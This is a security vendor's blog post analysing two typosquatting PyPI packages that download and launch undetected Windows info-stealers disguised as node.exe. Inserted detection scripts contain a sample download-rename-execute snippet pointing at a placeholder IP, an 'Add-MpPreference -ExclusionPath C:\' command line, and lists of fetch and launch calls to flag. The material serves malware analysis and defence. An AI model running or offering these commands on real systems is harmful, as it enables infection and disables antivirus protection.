Recently identified PyPI packages called "netfetcher" and "pyfetcher" impersonate open source libraries and target Windows users with malicious executables that have a zero detection rate among leading antivirus engines. Furthermore, some of these executables are called "node.exe" and even bear the NodeJS icon and metadata, making them evasive and easily mistaken for legitimate libraries.
"PyFetch for Windows" not
Tracked as sonatype-2024-3204, the PyPI packages "netfetcher" and "pyfetcher" describe themselves as utilities for Windows with identical names. Instead, they download malicious executables which, despite drawing suspicion from human analysts, may escape the scrutiny of machines given their highly evasive nature.
As an example, the "__init__.py" file in a version of one of these packages was seen downloading a Windows binary from IP address 194.163.191[.]205.
The binary is then renamed to "netflix_checker_cache.exe" and launched.
Netflix "Checker" is a colloquial term used by digital pirates and skid programmers to refer to unofficial utilities designed to check whether or not a provided list of usernames and passwords represents active Netflix accounts. But, that's merely a misnomer here.
Sonatype security researcher Adam Reynolds, who analyzed the package, explains:
"There isn't much going on here in terms of the behavior of the python package itself. No attempt was made to obfuscate the code that downloads and executes the binary, or to hide it among legitimate functionality; a cursory look at the code would arouse any developer's suspicion," says the researcher.
"The description bills the package as 'PyFetch for Windows,' and the name, pyfetcher, is close enough to the target that it's conceivable that someone could download the package in error or through a typo."
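The download, rename and launch sequence described above can be flagged before installation with a static pass over a package's `__init__.py`. The following is an added example, not Sonatype's tooling and not the package's own code; the call lists, the name `scan_init` and the sample source (which uses a documentation IP address) are assumptions made for illustration.

```python
import ast
import re

# Call names that fetch remote content or start a process (illustrative, not exhaustive).
FETCH = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get", "urlretrieve", "urlopen"}
LAUNCH = {"os.system", "os.startfile", "subprocess.Popen", "subprocess.run", "subprocess.call"}
IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|$)")

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else ''."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""

def scan_init(source):
    """Statically inspect package source; nothing in it is executed."""
    tree = ast.parse(source)
    found = {"fetch": [], "launch": [], "ip_urls": [], "exe_names": []}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted(node.func)
            if name in FETCH:
                found["fetch"].append((node.lineno, name))
            elif name in LAUNCH:
                found["launch"].append((node.lineno, name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if IP_URL.match(node.value):
                found["ip_urls"].append(node.value)  # URL addressed by raw IP
            elif node.value.lower().endswith(".exe"):
                found["exe_names"].append(node.value)
    # A fetch plus a process launch in the same module is the pattern of interest.
    found["download_and_execute"] = bool(found["fetch"] and found["launch"])
    return found

# Constructed sample (not the package's real code); 203.0.113.10 is a documentation address.
SAMPLE = '''
import os, urllib.request
urllib.request.urlretrieve("http://203.0.113.10/file.bin", "tmp.bin")
os.rename("tmp.bin", "netflix_checker_cache.exe")
os.startfile("netflix_checker_cache.exe")
'''

if __name__ == "__main__":
    print(scan_init(SAMPLE))
```

Aliased imports such as `import subprocess as sp` are not resolved here, so a production check would need to track import bindings as well.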
Malicious "node" binary undetected by antivirus engines
Reynolds explains, however, that the binary that the package downloads is more interesting.
The aforementioned Netflix Checker binary, a 64-bit Windows executable, has also been known as node.exe previously [VirusTotal analysis] and at the time of detection had a zero detection rate lasting days.
"The file hash wasn't flagged by the major antivirus vendors, so at least some care was taken by the threat actor towards concealment," states the researcher.
"However, some artifacts from later stages of the attack have been observed in the wild before, so this is not a completely novel malware. At the time of writing the threat actor's C2 server is still active, so it remains a serious threat to anyone who did download the package."
The Netflix Checker executable (previously known as "node.exe" in other attacks) also bears the official NodeJS logo and metadata (including the description, file version, and copyright notice) that can make it appear to be the legitimate NodeJS for Windows library.
As to what this executable does?
It downloads and drops another executable called Update56b2.exe [VirusTotal analysis] from the same IP address. This file also had a zero detection rate among leading antivirus engines.
The 64-bit executables come with extensive anti-detection and stealth capabilities, which explains the low detection rate. As soon as these run, they attempt to exclude the entire primary Windows hard drive ("C:\") from virus scanners like Windows Defender so as to prevent security alerts from appearing.
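A whole-drive Defender exclusion like the one described above is a strong signal to alert on. This added example (not from the original analysis) assumes the exclusion is set through the PowerShell `Add-MpPreference` or `Set-MpPreference` cmdlets and shows up in process-creation command-line telemetry; the page does not say which mechanism this malware uses, and the sample lines are constructed.

```python
import re

# Matches the Defender cmdlets that add or replace exclusions and captures the
# -ExclusionPath value. Assumption: exclusions appear as PowerShell command lines.
CMD = re.compile(r"\b(?:Add|Set)-MpPreference\b.*?-ExclusionPath\s+(.+?)(?=\s+-\w|$)", re.I)
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?\*?$")


def excluded_paths(cmdline):
    """Return the paths passed to -ExclusionPath (comma-separated lists allowed)."""
    m = CMD.search(cmdline)
    if not m:
        return []
    return [p.strip().strip("'\"@() ") for p in m.group(1).split(",") if p.strip()]


def is_whole_drive(path):
    """True when an exclusion covers an entire drive, e.g. C:\\ or C:\\*."""
    return bool(DRIVE_ROOT.match(path))


def triage(cmdlines):
    """Return (cmdline, path) for every whole-drive exclusion found."""
    hits = []
    for line in cmdlines:
        for path in excluded_paths(line):
            if is_whole_drive(path):
                hits.append((line, path))
    return hits


# Constructed process-creation command lines (not captured from the sample above).
SAMPLE = [
    r'powershell.exe -NoProfile -Command "Add-MpPreference -ExclusionPath C:\"',
    r"powershell.exe Add-MpPreference -ExclusionPath C:\Build\cache -Force",
    r"cmd.exe /c whoami",
]

if __name__ == "__main__":
    for line, path in triage(SAMPLE):
        print(f"whole-drive exclusion {path!r} in: {line}")
```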
During the course of their execution, the executables continue to communicate with the aforementioned IP address, the command-and-control (C2) server from which they were downloaded.
Ultimately, these executables belong to the class of trojans and info-stealers that we have repeatedly seen before.
Open source malware blocked by Sonatype Repository Firewall
This isn't the first time a stunt like this has been pulled, but it's a stark reminder of threat actors' evolving tactics and commitment to exploiting the open source ecosystem for nefarious reasons. The case highlights a pressing need for improved supply chain security measures and greater vigilance in monitoring the third-party software registries that developers use. Organizations must prioritize security at every stage of the development process to mitigate risks associated with third-party dependencies.
Sonatype Repository Firewall and Sonatype Lifecycle stay on top of nascent attacks and vulnerabilities and provide you with detailed insights to thwart previously undetected malware, Potentially Unwanted Applications (PUAs), and vulnerable components from reaching your builds.
Threat actors create malicious software components and distribute them through public open source repositories. This tactic is growing in popularity, and malicious open source is rapidly expanding.
Malicious open source is designed to evade typical software composition analysis (SCA) scanners. However, users of Sonatype Repository Firewall can rest easy knowing that these packages would automatically be blocked from reaching their development builds, keeping their software development life cycle (SDLC) hygienic.
If you're not already protected with Sonatype, get in touch so we can show you Repository Firewall in action.
Written by Ax Sharma
Ax is a Staff Security Researcher & Malware Analyst at Sonatype with a penchant for open source software. His works and expert analyses have frequently been featured by leading media outlets including the BBC. Ax's expertise lies in security vulnerability research, reverse engineering, and cybercrime investigations. He has a passion for educating a wide range of audiences through writing and vlogs.